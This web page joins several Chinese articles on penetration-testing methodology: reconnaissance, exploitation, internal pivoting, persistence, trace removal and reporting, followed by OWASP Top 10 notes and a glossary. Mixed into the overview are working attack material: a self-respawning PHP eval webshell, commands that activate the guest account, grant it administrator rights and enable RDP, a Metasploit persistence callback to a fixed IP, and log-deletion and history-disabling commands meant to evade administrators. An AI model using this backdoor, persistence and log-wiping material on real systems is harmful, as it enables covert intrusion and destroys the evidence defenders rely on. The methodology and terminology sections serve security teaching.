精华内容
下载资源
问答
  • 渗透测试流程图-PTES渗透测试执行标准,涉及渗透测试全流程,从前期准备交互阶段到情报收集、漏洞分析、渗透攻击到后渗透测试及报告。
  • 渗透测试流程图.zip

    2020-04-06 14:27:11
    渗透测试流程
  • 渗透测试流程

    2019-01-27 23:21:04
    渗透测试流程简介 哈哈哈哈 这个简介还是比较厉害的 。
  • 一次完整的渗透测试流程

    万次阅读 多人点赞 2018-12-01 19:13:56
    渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后...

    目录

    渗透测试

    信息收集

    漏洞探测

    漏洞利用

    内网转发

    内网渗透

    痕迹清除

    撰写渗透测试保告


    如果想跟我一起讨论,那快加入我的知识星球吧!  

    渗透测试

    渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!

    渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全法

    渗透测试分为 白盒测试黑盒测试

    • 白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析
    • 黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透

    我们现在就模拟黑客对一个网站进行渗透测试,这属于黑盒测试,我们只知道该网站的URL,其他什么的信息都不知道。

    接下来,我就给大家分享下黑盒渗透测试的流程和思路!

    当我们确定好了一个目标进行渗透之后,第一步该做的是什么呢?

    信息收集

    第一步做的就是信息收集,正所谓知己知彼百战百胜,我们根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。更多的关于信息收集,我在另一篇文章中很详细的介绍了信息收集需要收集哪些信息,以及信息收集过程中需要用到的工具,传送门——> 渗透测试之信息收集

    漏洞探测

    当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:

    这些是网站经常发现的一些漏洞,还有一些网站漏洞,这里我就不一一列举出来了。

    网站漏洞扫描工具也有很多,比如:

    网站漏洞扫描工具我就列举这几种,还有很多,最常用的是这几个!

    漏洞利用

    当我们探测到了该网站存在漏洞之后,我们就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。常用的漏洞利用工具如下:

    SQL注入 , 传送门——> Sqlmap的使用

    XSS跨站脚本,传送门——> Beef-XSS的使用

    抓包改包工具,——> Burpsuite工具的使用  、  Fidder抓包软件的使用

    文件上传漏洞,上传漏洞的话,我们一般会上传一句话木马上去,进而再获得webshell,传送门——> Webshell和一句话木马

    但是,获得了webshell后,一般权限很低,所以我们需要提权,可以选择反弹一个MSF类型的shell提权:Metasploit Framework(MSF)的使用  、 Msfvenonm生成一个后门木马,也可以反弹一个CobaltStrike类型的shell:渗透测试神器Cobalt Strike的使用, 也可以MSF和CobaltStrike联动:MSF和CobaltStrike联动 也可以使用其他提权:Windows提权 、 Linux提权

    内网转发

    当我们获取到了网站的Webshell之后,如果我们想获取该主机的有关信息,我们可以将该主机的webshell换成MSF的shell。直接生成一个木马,然后在菜刀中执行该木马,我们就能接收到一个MSF类型的shell了。

    如果我们还想进一步的探测内网主机的信息的话,我们就需要进行内网转发了。我们是不能直接和内网的主机通信的,所以我们就需要借助获取到的webshell网站的服务器和内网主机进行通信。

    内网横向渗透

    当我们在获取了外网服务器的权限,进入该系统后,我们要想尽办法从该服务器上查找到我们想要的信息。

    对于windows主机,我们应该多去翻翻目录,或许能有很多意想不到的结果。很多人习惯把账号密码等容易忘的东西存放在备忘录中,或者是桌面上。我们还可以查找数据库的连接文件,查看数据库的连接账号密码等敏感信息。当我们获得了windows主机的账号密码,或者是自己创建了新用户后,我们为了不被网站管理员发现和不破坏服务器。我们尽量不要使用远程桌面。因为使用远程桌面动静比较大,如果此时服务器管理员也在登录,而你此时通过远程桌面登录的话,会将管理员挤掉,而你也将很快的被管理员踢掉。对于实在是要远程桌面登录的情况的话,我们尽量不要新建一个用户进行登录。我们可以激活  guest 用户,然后将其加入 administrators 组里面,用 guest 用户身份登录。在RDP远程登录后,我们可以查看其他用户桌面上和其他目录有哪些软件,我们要找的目标有以下。

    • FTP相关的软件
    • 数据库相关的软件
    • 打开浏览器,查看历史记录,查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码

    从该主机上找到的账号密码,我们可以做一个字典,在对内网其他机器进行爆破的时候,很有可能是同密码。

    net user  guest  /active:yes                      #激活guest用户
    net localgroup  administrators  guest  /add       #将guest用户添加到
    net user guest    密码                            #更改guest用户密码
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f                          #开启3389端口

    对于Linux主机,我们可以查看开放的端口号,开放的服务,与其建立连接的内网主机。查看目录,查找网站数据库连接密码。总之,就是尽可能的多查找一些账号密码,这对于内网的账号爆破非常有用。

    在搭建了隧道可以通内网后,我们首先就需要对内网进行资产发现了。但是对于内网存活网段的判断是一个大问题。内网很有可能同时存在 10.0.0.0/8、172.16.0.0/16、192.168.0.0/24 网段。这就需要我们用扫描器对其进行探测了。通过代理进行内网扫描不建议使用nmap。如果是在本地主机通过代理扫描,可以图形化界面的话,可以使用 RouterScan 、御剑高速TCP全端口扫描器、IIS_Scanner。但是注意线程调低一点,不然代理很容易崩了。如果使用命令行扫描器的话,可以使用S扫描器。在扫描了内网资产和端口开放情况后,对于445端口,就可以打一波MS17_010。但是注意通过代理打445,和之前的是不一样的。传送门——> 内网渗透之MS17-010 。对于3389端口,可以打一波CVE-2019-0708,传送门——> CVE-2019-0708 远程桌面漏洞复现 。对于1433/3306/6379等端口,可以尝试爆破,利用之前收集到的账号密码成功率更高哦。

    关于内网渗透(域环境和非域环境):内网渗透

    内网的横向渗透MSF比较好用:

    内网渗透的ICMP和DNS隧道搭建:

    相关文章:内网渗透测试之域渗透详解!

                      内网渗透中mimikatz的使用

    权限维持

    在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。

    Web后门

    1:隐藏后门文件(将文件设置为隐藏)

    2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。

    <?php
        set_time_limit(0);//程序执行时间
        ignore_user_abort(1);//关掉终端后脚本仍然运行
        unlink(__FILE__);//文件完整名
        while(1){
            file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");
            $b=array_keys($a)[0];
            eval($b);?>');
            sleep(5);
        }
    ?>

    3: 404页面隐藏后门,或者在其他自带文件中插入后门代码

    注:以上几种后门方法均能被D盾等工具检测到

    Windows系统

    1:建立隐藏用户,在用户名后加 $ 

    2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控

    3:MSF里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现

    #反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
    run persistence -X -i 5 -p 8888 -r 192.168.10.27  
     
    #然后它就在目标机新建了这个文件:C:\Windows\TEMP\CJzhFlNOWa.vbs ,并把该服务加入了注册表中,只要开机就会启动

    4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。

    5:shift后门

    6:远程桌面会话劫持 

    Linux系统

    1:SSH后门

    2:crontab定时任务

    3:SSH公钥

    4:创建SUID=0的用户

    痕迹清除

    当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!

    我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。

    最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。

    Windows系统

    1:如果是windows系统,可用MSF中的 clearev 命令清除痕迹

    2:如果3389远程登录过,需要清除mstsc痕迹

    3:执行命令清除日志:

    del %WINDR%\* .log /a/s/q/f

    4:如果是web应用,找到web日志文件,删除 

    相关文章:WINDOWS之入侵痕迹清理总结

    Linux系统

    1:如果是Linux系统,在获取权限后,执行以下命令,不会记录输入过的命令

    export HISTFILE=/dev/null export HISTSIZE=0

    2:删除 /var/log 目录下的日志文件

    3:如果是web应用,找到web日志文件,删除 

    撰写渗透测试保告

    在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!

    我们做的这一切的一切都是为了营造一个更安全更可信任的网络环境,大家切记不要利用本篇文章进行违法犯罪行为!

    未完待续。。。。。。

     如果想跟我一起讨论的话,就快加入我的知识星球吧。星球里有一千多位同样爱好安全技术的小伙伴一起交流!知识星球 | 深度连接铁杆粉丝,运营高品质社群,知识变现的工具

     

    相关文章:红蓝对抗经验小结

    展开全文
  • Step6、后渗透攻击阶段:后渗透攻击是整个渗透测试过程中最能体现渗透测试团队创造力与技术能力的环节,前面的环节可以说是按部就班地完成非常普遍的目标,而在这个环节中,需要渗透测试团队根据目标组织的业务经营...

    网络安全的定义

    什么是网络安全?

    1、国际化标准组织(ISO)引用ISO-74982文献中对安全的定义:安全就是最大程度地减少数据和资源被攻击的可能性。
    2、《计算机信息安全系统保护条例》中的第三条规范了包括计算机网络系统在内的计算机信息系统安全的概述:“计算机信息系统的安全保护,应当保障计算机及其相关的配套的设备、设施(含网络)的安全,运行环境的安全,保障信息的安全,保障计算机功能的正常发挥,以维护计算机信息系统的安全运行。”
    3、从本质上讲,网络安全是指网络系统的硬件、软件和系统中的数据受到保护,不因偶然或恶意的攻击而受到破坏,更改、泄露、系统连续可靠正常的运行,网络服务不中断。广义上来讲,凡是涉及到网络上信息的保密性、完整性、可用性、可控性和不可否认性的相关技术和理论都属于网络安全所要研究的领域。
    4、欧共体(欧盟前身)对信息安全给出的定义如下:“网络与信息安全可被理解为:在既定的密级条件下,网络与信息系统抵御意外事件或恶意行为的能力。这些事件和行为将危及所存储或传输的数据,以及经由这些网络和系统所提供的服务的可用性、真实性和秘密性。”
    在这里插入图片描述

    网络安全的基本要素

    • 保密性 保密性是指信息不能被非法授权访问,即非授权用户即使得到信息内容也无法使用,通常通过访问控制和数据加密来保障信息的保密性
    • 完整性 完整性是指只有授权的人才能修改实体或进程,并且能够判断实体或进程是否被修改,一般通过访问控制来阻止篡改,通过算法来验证信息是否完整
    • 可用性 可用性是信息资源服务功能和性能可靠性的度量,设计物理、网络、系统、数据、应用和用户等多方面因素,是对信息网络总体可靠性的要求。使用访问控制来阻止非授权用户进入网络
    • 可控性 可控性主要是指对国家信息(包括非法加密)的监视审计,控制授权范围内的信息流动及行为方式,使用授权机制,控制信息传播范围、内容,必要时能恢复密钥,保障对网络资源及信息的可控性
    • 不可否认性 不可否认性是对出现的安全问题提供调查的依据和手段。使用审计、监控、防抵赖等安全机制,使攻击者、破坏者、依赖者“逃不脱”,并进一步对网络出现的安全问题提供调查依据和手段,实现安全的可审查性,一般通过数字签名来实现。

    网络安全的重要性

    • 随着信息科技的迅速发展及计算机网络的普及,计算机网络深入国家的政府、军事、文教、金融、商业等诸多的领域,可以说网络无处不在。

    网络脆弱性的原因

    • 开放性的网络环境
    • 协议本身的脆弱性
    • 操作系统的漏洞
    • 人为因素

    网络安全涉及的内容

    • 物理安全
      保证计算机信息系统各种设备的物理安全,是整个计算机信息系统安全的前提
    • 网络安全
      网络安全主要包括局域网和子网安全,数据传输的安全,网络运行安全,网络协议安全。
    • 系统安全
      包括操作系统的安全以及数据库系统的安全
    • 应用安全
      包括应用软件开发平台安全和应用系统安全
    • 管理安全
      网络安全至关重要的往往不是技术手段,而是对人的管理

    渗透测试简介

    什么是渗透测试?

    渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。

    渗透测试还具备以下两个显著特点:

    1. 渗透测试是一个渐进的并且逐步深入的过程。
    2. 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。

    PETS渗透测试执行标准

    Step1、前期交互阶段:在前期交互阶段,在渗透测试团队与客户进行交互讨论,最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。
    Step2、情报搜集阶段:在目标范围确定之后,将进入情报搜集阶段,渗透测试团队可以利用各种信息来源与搜集技术方法,尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。
    Step3、威胁建模阶段:在搜集到充足的情报信息之后,渗透测试团队的成员们停下敲击键盘,大家聚到一起针对获取的信息进行威胁建模(Threat Modeling)与攻击规划。这是渗透测试过程中非常重要,但很容易被忽略的一个关键点。
    Step4、漏洞分析阶段:在确定出最可行的攻击通道之后,接下来需要考虑该如何取得目标系统的访问控制权,即漏洞分析(Vulnerability Analysis)
    Step5、渗透攻击阶段:渗透攻击是是渗透测试过程中最有魅力的环节。在此环节中,渗透测试团队需要利用他们所找出的目标系统安全漏洞,来真正入侵系统当中,获得访问权。
    Step6、后渗透攻击阶段:后渗透攻击是整个渗透测试过程中最能体现渗透测试团队创造力与技术能力的环节,前面的环节可以说是按部就班地完成非常普遍的目标,而在这个环节中,需要渗透测试团队根据目标组织的业务经营模式,保护资产形式与安全防御计划的不同特点,自主设计出攻击目标,识别关键基础设施,并寻找客户组织最具价值和尝试安全保护的信息和资产,最终能够对客户组织造成最重要业务影响的攻击途径。
    Step7、撰写报告阶段:渗透测试过程最终向客户组织提交,取得认可并成功获得合同付款的就是一份渗透测试报告。这份情报凝聚了之前所有阶段之中渗透测试团队所获取的关键情报信息、探测和发掘出的系统安全漏洞、成功渗透攻击的过程,以及造成业务影响后果的途径,同时还要站在防御者的角度上,帮助他们分析安全防御体系中的薄弱环节、存在的问题,以及修补与升级技术方案。

    实际渗透测试中的流程

    1、明确目标:当拿到一个渗透测试项目时,我们首先应该明确客户要求我们进行渗透测试的范围以及整体项目的时间。
    2、信息收集:子域名、系统版本、架构、真实IP地址、whios查询、历史漏洞查询、指纹识别等。
    3、漏洞发现:通过漏扫软件结合手动挖掘常规的web、系统等漏洞。
    4、漏洞利用:由浅入深、旁敲侧推、尽可能的将漏洞的价值发挥到最大化。
    5、后渗透:包括内网渗透、权限维持、权限提升,读取用户hash,这里一定要把握好尺度。
    6、报告文档阶段:根据之前测试获取的漏洞及企业要求去编写最终的渗透测试报告。

    风险规避

    • 不要进行诸如ddos攻击,不破坏数据测试之前对重要数据进行备份
    • 任何测试执行前必须和客户进行沟通,以免引来不必要的麻烦
    • 可以对原始系统生成镜像环境,然后对镜像环境进行的测试
    • 明确渗透测试范围

    OWASP Top 10应用安全风险-2017

    A1:2017-注入:将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。
    A2:2017-失效的身份认证:通常,通过错误使用应用程序的身份认证和会话管理功能,攻击者能够破译密码、密钥或会话令牌,或者利用其它开发缺陷来暂时性或永久性冒充其他用户的身份。
    A3:2017-敏感数据泄露:许多Web应用程序和API都无法正确保护敏感数据,例如:财务数据、医疗数据和PII数据。攻击者可以通过窃取过修改未加密的数据来实施信用卡诈骗、身份盗窃或其他犯罪行为。未加密的敏感数据容易受到破坏,因此,我们需要对敏感数据加密,这些数据包括:传输过程中的数据、存储的数据以及浏览器的交互数据。
    新 A4:2017-XML外部实体(XXE):许多较早的或配置错误的XML处理器评估了XML文件中的外部实体引用。攻击者可以利用外部实体窃取使用URL文件处理器的内部文件和共享文件、监听内部扫描端口、执行远程代码和实施拒绝服务攻击。
    A5:2017-失效的访问控制:未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据,例如:访问其他用户的账户、查看敏感文件、修改其他用户的数据、更改访问权限等。
    A6:2017-安全配置错误:安全配置错误是最常见的安全问题,这通常是由于不安全的默认配置、不完整的临时配置、开源云存储、错误的HTTP标头配置以及包含敏感信息的详细错误信息所造成的。因此,我们不仅需要对所有的操作系统、框架、库和应用程序进行安全配置,而且必须及时修补和升级它们。
    A7:2017-跨站脚本:当应用程序的新网页中包含不受信任的、未经恰当验证或转义的数据时,或者使用可以创建HTML或Javascript的浏览器API更新现有的网页时,就会出现XSS缺陷。XSS让攻击者能够在受害者的浏览器中执行脚本,并劫持用户会话,破坏网站或将用户重定向到恶意站点
    新A8:2017-不安全的反序列化:不安全的反序列化会导致远程代码执行,即使反序列化缺陷不会导致远程代码执行,攻击者也可以利用它们来执行攻击,包括:重播攻击、注入攻击和特权升级攻击
    A9:2017-使用含有已知漏洞的组件:组件(例如:库、框架和其他软件模块)拥有和应用程序相同的权限。如果应用程序中含有已知漏洞的组件的应用程序和API可能会破坏应用程序防御、造成各种攻击并产生严重影响。
    新A10:2017-不足的日志记录和监控:以及事件响应缺失或无效的集成,使攻击者能够进一步攻击系统、保持持续性或转向更多系统,以及篡改、提取或销毁数据。大多数缺陷研究显示,缺陷被检测出的时间超过200天,且通常通过外部检测方检测,而不是通过内部流程或监控检测。

    渗透测试术语简介

    • 白帽子:白帽子描述的是正面的黑客。通过技术手段识别计算机系统或网络系统中的安全漏洞,提交给厂商并提出修复方法。
    • 黑帽子:为了谋取利益而行走在法律边缘甚至违法乱纪的骇客。
    • 灰帽子:介质与黑白之间,无法具体的定性。
    • 肉鸡:就是傀儡机,可以随意被控制的电脑或服务器。
    • 木马:一些用来获取用户权限的程序或者代码段。
    • 后门:为了方便二次进入系统留下的非常隐蔽的后门程序。
    • shell:命令执行环境,通常所说的拿Shell,就是拿到对方的命令执行环境。
    • webshell:通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。
    • poc: 用来验证漏洞存在的一段代码或程序。
    • EXP: 漏洞利用的一段代码或程序。
    • Payload:Payload即有效攻击载荷,可以是一段代码,被隐藏并且秘密发送的信息。
    • WAF:web应用防护系统,也称之为网站应用级入侵防御系统。
    • 提权:利用一些手段将低权限提升为高权限,这里的高权限一般为管理员或系统权限。
    • API:高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的供给形式(极强的隐蔽性、潜伏期长、持续性强、目标性强)。
    • CMS:内容管理系统,可以理解为网站的一种模板,将一些功能集中控制管理,是网站搭建变得更为快捷。
    • 黑盒测试:即对内部情况一无所知的情况下进行渗透测试或者其他测试。
    • 白盒测试:了解内部系统、结构、源码的情况下进行渗透测试或其他测试。
    • 灰盒测试:介质于黑白盒之间的渗透测试或其它测试。
    • 0day: 0day漏洞是指负责应用程序的程序员或供应商所未知的软件缺陷。因为该漏洞未知,所以没有可用的补丁程序。
    • 1day: 1day刚发布但是已被发现官方刚发布补丁网络上还是存在大量的Vulnerability。
    • Nday: Nday已经被公布出来的0day。
    • Proxy: 代理。一类程序或系统,接收来自客户机算计的流量,并代表客户端与服务器交互,代理能用于过滤应用级别的制定类型的流量或缓存信息以提高性能。许多防火墙依赖代理进行过滤。
    • 加壳/脱壳:“壳”是一段专门负责保护软件不被非法修改或反编译的程序,它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。加壳就是将软件源码保护,脱壳相反。
    • Shellcode: shellcode是一段用于利用软件漏洞而执行的代码,shellcode 为16进制的机器码,因为经常让攻击者获得shell而得名。
    • 钓鲸攻击:捕鲸是另一种进化形式的鱼叉式网络钓鱼。它指的是针对高级管理人员和组织其他高级人员的网络钓鱼攻击。通过使电子邮件具有个性化并专门针对相关目标进行定制的攻击
    • 水坑攻击: 顾名思义,是在受害者必经之路设置了一个"水坑(陷阱)” 。最常见的做法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击目标访问该网站就会“中招”。
    • 横向移动:在纵向获取到某个服务器的权限时,我们可以以该服务器为跳板,进行横向拓展的内网攻击。
    • 电信诈骗:是指通过电话、网络和短信方式,编造虚假信息,设置骗局,对受害人实施远程、非接触式诈骗,诱使受害人打款或转账的犯罪行为,通常以冒充他人及仿冒、伪造各种合法外衣和形式的方式达到欺骗的目的。
    • 杀猪盘:网络流行词,电信诈骗的一种,是一种网络交友诱导股票投资、赌博等类型的诈骗方式,"杀猪盘” 则是”从业者们”自己起的名字,是指放长线“养猪”诈骗,养得越久,诈骗得越狠。
    • 脱库:将数据库中的数据导出。
    • 社工库:一种黑客将泄露在暗网/公网上的用户数据整合起来,并用来查询或者社工的手段的工具。
    • 撞库攻击:在获取到用户的一组账号密码时,尝试用该账号登录其他站点/app等。
    • 旁站:同一台服务器上可能存在其他的站点。
    • 蜜罐:可以联想为情报收集系统,用来诱导黑客进行攻击,以此来判断黑客行为,甚至完成反制。
    • 挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。
    • 网络钓鱼(Phishing):是"Fishing" 和"Phone" 的综合体,由于黑客始祖起初是以电话作案,所以用"Ph” 来取代“F”,创造了"Phishing" 。然而,当今的“网络钓鱼"攻击利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,受骗者往往会泄露自己的财务数据,如信用卡号、账户用户名、口令和社保编号等内容。
    • cc攻击:攻击者借助代理服务器生成指向受害主机的合法请求,实现DDOS和伪装就叫: CC(Challenge Collapsar)CC主要是用来攻击页面的。
    • Dos攻击:拒绝服务攻击。攻击者通过利用漏洞或发送大量的请求导致攻击对象无法访问网络或者网站无法被访问。
    • DDos攻击:分布式DOS攻击,常见的UDP、SYN、 反射放大攻击等等,就是通过许多台肉鸡一起向你发送一些网络请求信息,导致你的网络堵塞而不能正常上网。
    • 抓鸡:利用漏洞或其他手段批量的在公网上获取存在漏洞的主机,将其沦为肉鸡。
    • C2:C2全称为CommandandControl, 命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互,作名词解释时理解为攻击者的“基础设施”。
    • 鱼叉攻击:鱼叉攻击是将用鱼叉捕鱼形象的引入到了网络攻击中,主要是指可以使欺骗性电子邮件看起来更加可信的网络钓鱼攻击,具有更高的成功可能性。不同于撒网式的网络钓鱼,鱼叉攻击往往更加具备针对性,攻击者往往"见鱼而使叉"。
    • 黑产:网络黑产,指以互联网为媒介,以网络技术为主要手段,为计算机信息系统安全和网络空间管理秩序,甚至国家安全、社会政治稳定带来潜在威胁(重大安全隐患)的非法行为。例如非法数据交易产业。
    • 红队:通常指攻防演习中的攻击队伍。
    • 蓝队:通常指攻防演习中的防守队伍。
    • 紫队:攻防演习中新近诞生的一方,通常指监理方或者裁判方。
    • IDS:入侵检测系统,用于在黑客发起进攻或是发起进攻之前检测到攻击,并加以拦截。IDS是不同于防火墙。防火墙只能屏蔽入侵,而IDS却可以在入侵发生以前,通过一些信息来检测到即将发生的攻击或是入侵并作出反应。
    • IPS:IPS全称为Intrusion-PreventionSystem, 即入侵防御系统,目的在于及时识别攻击程序或有害代码及其克隆和变种,采取预防措施,先期阻止入侵,防患于未然。或者至少使其危害性充分降低。入侵预防系统一 般作为防火墙和防病毒软件的补充来投入使用。
    • 堡垒机:运用各种技术手段监控和记录运维人员对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为,以便集中报警、及时处理及审计定责。
    • VPN:虚拟专用网,在公用网络上建立专用网络,进行加密通讯,通过对数据包的加密和数据包目标地址的转换实现远程访问。
    • 科学上网:fq,翻越c防火墙,访问国外外网,实际上是一种不合法的行为。
    • CTF(夺旗赛):CTF (CaptureThe Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
    • awd攻防对抗赛:AWD(AttackWithDefense, 攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取Flag分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣!
    展开全文
  • 渗透测试流程&信息收集

    万次阅读 2021-07-30 15:37:06
    渗透测试流程分为7个阶段 信息收集 漏洞扫描 漏洞利用 内网转发 内网渗透 痕迹清除 编写报告 但在这7个阶段之前还有一个前提,就是授权,这个授权包括渗透测试的目标,范围,方式等细节 信息收集 先浏览一下...

    渗透测试是一种评估方法,一种通过模拟黑客的攻击方式,来评估网站安全的方法

    渗透测试流程分为7个阶段

    1. 信息收集
    2. 漏洞扫描
    3. 漏洞利用
    4. 内网转发
    5. 内网渗透
    6. 痕迹清除
    7. 编写报告

    但在这7个阶段之前还有一个前提,就是授权,这个授权包括渗透测试的目标,范围,方式等细节

    信息收集

    先浏览一下网站,了解网站的基本功能

    获取网站的shois信息

    nslookup获取网站ip,站长之家ping检测ip的真实性

    nmap扫描开放的端口

    御剑扫描网站架构

    天眼查或企查查获取企业备案信息

    火狐浏览器常用的插件

    1. Flagfox:显示网站所在国家
    2. Wappalyzer:显示网站架构(服务器,编程语言等)
    3. HacKBar:用来提交url
    4. FoxyProxy:设置代理
    展开全文
  • 渗透测试流程 - 渗透测试的9个步骤

    千次阅读 2020-05-25 11:49:13
    渗透测试流程: 1.明确目标 2.分析风险,获得授权 3.信息收集 4.漏洞探测(手动&自动) 5.漏洞验证 6.信息分析 7.利用漏洞,获取数据 8.信息整理 9.形成报告 1.明确目标 1)确定范围:测试的范围,如:IP、...

    渗透测试的流程:

    明确目标
    分析风险,获得授权
    信息收集
    漏洞探测(手动&自动)
    漏洞验证
    信息分析
    利用漏洞,获取数据
    信息整理
    形成报告
    

    1.明确目标

    1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块;
    2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能否修改上传、能否提权…

    • 目标系统介绍、重点保护对象及特性。
    • 是否允许数据破坏?
    • 是否允许阻断业务正常运行?
    • 测试之前是否应当知会相关部门接口人?
    • 接入方式?外网和内网?
    • 测试是发现问题就算成功,还是尽可能的发现多的问题?
    • 渗透过程是否需要考虑社会工程?

    3)确定需求:web应用的漏洞(新上线程序)?业务逻辑漏洞(针对业务的)?人员权限管理漏洞(针对人员、权限)?
    根据需求和自己技术能力来确定能不能做、能做多少

    2.分析风险,获得授权

    分析渗透测试过程中可能产生的风险,如大量测试数据的处理、影响正常业务开展、服务器发生异常的应急、数据备份和恢复、测试人力物力成本…
    由测试方书写实施方案初稿并提交给客户(or本公司内部领导)进行审核。在审核完成后,从客户(or本公司内部领导)获取对测试方进行书面委托授权书,授权测试方进行渗透测试。

    3.信息收集

    在信息收集阶段,我们需要尽量多的收集关于目标系统的各种信息,比如:脚本语言的类型、服务器的类型、目录的结构、使用的开源软件、数据库类型、所有链接页面,用到的框架等。
    方式:主动扫描;开放搜索
    开放搜索:利用搜索引擎获得后台、未授权页面、敏感url

    基础信息:IP,网段,域名,端口
    系统信息:操作系统版本
    应用信息:各端口的应用,例如web应用,邮件应用等
    版本信息:所有探测到的版本
    服务信息:服务器类型、版本
    人员信息:域名注册人员信息,web应用中网站发帖人的id,管理员姓名等
    防护信息:试着看能否探测到防护设备
    

    4.漏洞探测(手动&自动)

    利用上一步中列出的信息,使用相应的漏洞检测

    方法:
    1)漏扫:AWVS、AppScan…
    2)结合漏洞去exploit-db等位置找利用
    3)在网上寻找验证POC

    内容:
    系统漏洞:系统没有及时打补丁
    Websever漏洞:Websever配置问题
    Web应用漏洞:Web应用开发问题
    其它端口服务漏洞:各种21/8080(st2)/7001/22/3389
    通信安全:明文传输,token在cookie中传送等

    5.漏洞验证

    将上一步中发现的有可能可以成功利用的全部漏洞都验证一遍。结合实际情况,搭建模拟环境进行试验,成功后再应用于目标中。

    • 自动化验证:结合自动化扫描工具提供的结果
    • 手工验证:根据公开资源进行验证
    • 试验验证:自己搭建模拟环境进行验证
    • 登录猜解:有时可以尝试猜解一下登陆口的账号密码等信息
    • 业务漏洞验证:如发现业务漏洞,要进行验证
    • 公开资源的利用

    ​ exploit-db/wooyun/
    ​ 渗透代码网站
    ​ 通用、缺省口令
    ​ 厂商的漏洞警告等

    6.信息分析

    为下一步实施渗透做准备

    • 精准攻击:准备好上一步探测到的漏洞exp(漏洞利用),用来精准攻击
    • 绕过防御机制:是否有防火墙等设备,如何绕过
    • 定制攻击路径:最佳工具路径,根据薄弱入口,高内网权限位置,最终目标
    • 绕过检测机制:是否有检测机制,流量监控,杀毒软件,恶意代码检测等(免杀)
    • 攻击代码:经过试验得来的代码,包括不限于xss代码,sql注入语句等

    7.利用漏洞,获取数据

    • 实施攻击:根据前几步的结果,进行攻击
    • 获取内部信息:基础设施(网络连接,vpn,路由,拓扑等)
    • 进一步渗透:内网入侵,敏感目标
    • 持续性存在:一般对客户做渗透不需要。rookit,后门,添加管理账号,驻扎手法等
    • 清理痕迹:清理相关日志(访问,操作),上传文件等

    8.信息整理

    • 整理渗透工具:整理渗透过程中用到的代码,poc,exp等
    • 整理收集信息:整理渗透过程中收集到的一切信息
